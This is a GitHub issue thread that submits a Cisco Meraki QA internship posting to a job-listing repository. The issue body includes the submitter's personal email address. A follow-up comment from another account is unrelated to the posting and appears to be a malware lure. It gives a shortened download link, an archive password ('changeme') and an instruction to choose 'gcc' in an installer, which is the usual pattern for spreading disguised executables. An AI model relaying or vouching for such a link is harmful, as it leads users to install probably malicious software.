### ISSUE TITLE
cisco qa

### ISSUE THREAD

**Issue by beakae** [Ouckah/Summer2025-Internships#884]
### Link to Internship Posting

https://jobs.cisco.com/jobs/ProjectDetail/Test-Automation-QA-Intern-FY25-Summer-2025/1427979

### Company Name

Cisco Meraki

### Internship Title

QA Intern

### Location

San Francisco, CA | Chicago, IL | Remote

### What season is this internship for?

Summer

### Does this internship offer sponsorship?

Does Not Offer Sponsorship

### Is this internship currently accepting applications?

Yes

### Email associated with your GitHub account (Optional)

kantorskibrandon1@gmail.com

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
